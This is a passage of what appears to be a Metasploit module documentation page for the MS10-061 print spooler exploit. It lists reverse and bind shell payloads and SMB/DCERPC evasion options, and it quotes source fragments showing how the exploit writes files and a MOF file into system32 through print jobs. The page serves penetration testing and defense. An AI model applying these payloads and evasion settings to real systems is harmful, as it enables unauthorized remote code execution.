   129  payload/windows/shell/bind_tcp_uuid                                          normal  No     Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   130  payload/windows/shell/reverse_ipv6_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (IPv6)
   131  payload/windows/shell/reverse_nonx_tcp                                       normal  No     Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   132  payload/windows/shell/reverse_ord_tcp                                        normal  No     Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   133  payload/windows/shell/reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Stager
   134  payload/windows/shell/reverse_tcp_allports                                   normal  No     Windows Command Shell, Reverse All-Port TCP Stager
   135  payload/windows/shell/reverse_tcp_dns                                        normal  No     Windows Command Shell, Reverse TCP Stager (DNS)
   136  payload/windows/shell/reverse_tcp_rc4                                        normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   137  payload/windows/shell/reverse_tcp_rc4_dns                                    normal  No     Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   138  payload/windows/shell/reverse_tcp_uuid                                       normal  No     Windows Command Shell, Reverse TCP Stager with UUID Support
   139  payload/windows/shell/reverse_udp                                            normal  No     Windows Command Shell, Reverse UDP Stager with UUID Support
   140  payload/windows/shell_bind_tcp                                               normal  No     Windows Command Shell, Bind TCP Inline
   141  payload/windows/shell_bind_tcp_xpfw                                          normal  No     Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   142  payload/windows/shell_hidden_bind_tcp                                        normal  No     Windows Command Shell, Hidden Bind TCP Inline
   143  payload/windows/shell_reverse_tcp                                            normal  No     Windows Command Shell, Reverse TCP Inline
   144  payload/windows/speak_pwned                                                  normal  No     Windows Speech API - Say "You Got Pwned!"
   145  payload/windows/upexec/bind_hidden_ipknock_tcp                               normal  No     Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   146  payload/windows/upexec/bind_hidden_tcp                                       normal  No     Windows Upload/Execute, Hidden Bind TCP Stager
   147  payload/windows/upexec/bind_ipv6_tcp                                         normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   148  payload/windows/upexec/bind_ipv6_tcp_uuid                                    normal  No     Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   149  payload/windows/upexec/bind_named_pipe                                       normal  No     Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   150  payload/windows/upexec/bind_nonx_tcp                                         normal  No     Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   151  payload/windows/upexec/bind_tcp                                              normal  No     Windows Upload/Execute, Bind TCP Stager (Windows x86)
   152  payload/windows/upexec/bind_tcp_rc4                                          normal  No     Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   153  payload/windows/upexec/bind_tcp_uuid                                         normal  No     Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   154  payload/windows/upexec/reverse_ipv6_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (IPv6)
   155  payload/windows/upexec/reverse_nonx_tcp                                      normal  No     Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   156  payload/windows/upexec/reverse_ord_tcp                                       normal  No     Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   157  payload/windows/upexec/reverse_tcp                                           normal  No     Windows Upload/Execute, Reverse TCP Stager
   158  payload/windows/upexec/reverse_tcp_allports                                  normal  No     Windows Upload/Execute, Reverse All-Port TCP Stager
   159  payload/windows/upexec/reverse_tcp_dns                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (DNS)
   160  payload/windows/upexec/reverse_tcp_rc4                                       normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   161  payload/windows/upexec/reverse_tcp_rc4_dns                                   normal  No     Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   162  payload/windows/upexec/reverse_tcp_uuid                                      normal  No     Windows Upload/Execute, Reverse TCP Stager with UUID Support
   163  payload/windows/upexec/reverse_udp                                           normal  No     Windows Upload/Execute, Reverse UDP Stager with UUID Support
   164  payload/windows/vncinject/bind_hidden_ipknock_tcp                            normal  No     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   165  payload/windows/vncinject/bind_hidden_tcp                                    normal  No     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   166  payload/windows/vncinject/bind_ipv6_tcp                                      normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   167  payload/windows/vncinject/bind_ipv6_tcp_uuid                                 normal  No     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   168  payload/windows/vncinject/bind_named_pipe                                    normal  No     VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   169  payload/windows/vncinject/bind_nonx_tcp                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   170  payload/windows/vncinject/bind_tcp                                           normal  No     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   171  payload/windows/vncinject/bind_tcp_rc4                                       normal  No     VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   172  payload/windows/vncinject/bind_tcp_uuid                                      normal  No     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   173  payload/windows/vncinject/reverse_hop_http                                   normal  No     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   174  payload/windows/vncinject/reverse_http                                       normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   175  payload/windows/vncinject/reverse_http_proxy_pstore                          normal  No     VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   176  payload/windows/vncinject/reverse_ipv6_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   177  payload/windows/vncinject/reverse_nonx_tcp                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   178  payload/windows/vncinject/reverse_ord_tcp                                    normal  No     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   179  payload/windows/vncinject/reverse_tcp                                        normal  No     VNC Server (Reflective Injection), Reverse TCP Stager
   180  payload/windows/vncinject/reverse_tcp_allports                               normal  No     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   181  payload/windows/vncinject/reverse_tcp_dns                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   182  payload/windows/vncinject/reverse_tcp_rc4                                    normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   183  payload/windows/vncinject/reverse_tcp_rc4_dns                                normal  No     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   184  payload/windows/vncinject/reverse_tcp_uuid                                   normal  No     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   185  payload/windows/vncinject/reverse_winhttp                                    normal  No     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)

Evasion Options


Here is the full list of possible evasion options supported by the windows/smb/ms10_061_spoolss exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/smb/ms10_061_spoolss) > show evasion

Module evasion options:

   Name                             Current Setting  Required  Description
   ----                             ---------------  --------  -----------
   DCERPC::fake_bind_multi          true             no        Use multi-context bind calls
   DCERPC::fake_bind_multi_append   0                no        Set the number of UUIDs to append the target
   DCERPC::fake_bind_multi_prepend  0                no        Set the number of UUIDs to prepend before the target
   DCERPC::max_frag_size            4096             yes       Set the DCERPC packet fragmentation size
   DCERPC::smb_pipeio               rw               no        Use a different delivery method for accessing named pipes (Accepted: rw, trans)
   SMB::obscure_trans_pipe_level    0                yes       Obscure PIPE string in TransNamedPipe (level 0-3)
   SMB::pad_data_level              0                yes       Place extra padding between headers and data (level 0-3)
   SMB::pad_file_level              0                yes       Obscure path names used in open/create (level 0-3)
   SMB::pipe_evasion                false            yes       Enable segmented read/writes for SMB Pipes
   SMB::pipe_read_max_size          1024             yes       Maximum buffer size for pipe reads
   SMB::pipe_read_min_size          1                yes       Minimum buffer size for pipe reads
   SMB::pipe_write_max_size         1024             yes       Maximum buffer size for pipe writes
   SMB::pipe_write_min_size         1                yes       Minimum buffer size for pipe writes
   TCP::max_send_size               0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                  0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Payload


Here is a relevant code snippet related to the "Payload" error message:

96:	        )
97:	      )
98:	
99:	      printers = []
100:	
101:	      lerror, lconv, lentries, lcount = res['Payload'].to_s[
102:	        res['Payload'].v['ParamOffset'],
103:	        res['Payload'].v['ParamCount']
104:	      ].unpack("v4")
105:	
106:	      data = res['Payload'].to_s[

Unable to open printer: <VALUE>


Here is a relevant code snippet related to the "Unable to open printer: <VALUE>" error message:

134:	      print_status("Attempting to exploit MS10-061 via #{pname} ...")
135:	
136:	      # Open the printer
137:	      status,ph = open_printer_ex(pname)
138:	      if status != 0
139:	        fail_with(Failure::Unknown, "Unable to open printer: #{Msf::WindowsError.description(status)}")
140:	      end
141:	      print_status("Printer handle: %s" % ph.unpack('H*'))
142:	
143:	
144:	      # NOTE: fname can be anything nice to write to (cwd is system32), even

Failed to close printer: <VALUE>


Here is a relevant code snippet related to the "Failed to close printer: <VALUE>" error message:

153:	      write_file_contents(ph, "wbem\\mof\\#{mofname}", mof)
154:	
155:	      # ClosePrinter
156:	      status,ph = close_printer(ph)
157:	      if status != 0
158:	        fail_with(Failure::Unknown, "Failed to close printer: #{Msf::WindowsError.description(status)}")
159:	      end
160:	
161:	      break if session_created?
162:	    }
163:	

Unable to start print job: <VALUE>


Here is a relevant code snippet related to the "Unable to start print job: <VALUE>" error message:

185:	    doc = rand_text_alphanumeric(16+rand(16))
186:	
187:	    # StartDocPrinter
188:	    status,jobid = start_doc_printer(ph, doc, fname)
189:	    if status != 0 or jobid < 0
190:	      fail_with(Failure::Unknown, "Unable to start print job: #{Msf::WindowsError.description(status)}")
191:	    end
192:	    print_status("Job started: 0x%x" % jobid)
193:	
194:	    # WritePrinter
195:	    status,wrote = write_printer(ph, data)

Failed to write %d bytes!


Here is a relevant code snippet related to the "Failed to write %d bytes!" error message:

192:	    print_status("Job started: 0x%x" % jobid)
193:	
194:	    # WritePrinter
195:	    status,wrote = write_printer(ph, data)
196:	    if status != 0 or wrote != data.length
197:	      fail_with(Failure::Unknown, ('Failed to write %d bytes!' % data.length))
198:	    end
199:	    print_status("Wrote %d bytes to %%SystemRoot%%\\system32\\%s" % [data.length, fname])
200:	
201:	    # EndDocPrinter
202:	    status = end_doc_printer(ph)

Failed to end print job: <VALUE>


Here is a relevant code snippet related to the "Failed to end print job: <VALUE>" error message:

199:	    print_status("Wrote %d bytes to %%SystemRoot%%\\system32\\%s" % [data.length, fname])
200:	
201:	    # EndDocPrinter
202:	    status = end_doc_printer(ph)
203:	    if status != 0
204:	      fail_with(Failure::Unknown, "Failed to end print job: #{Msf::WindowsError.description(status)}")
205:	    end
206:	  end
207:	
208:	
209:	  #

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • jduck
  • hdm

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.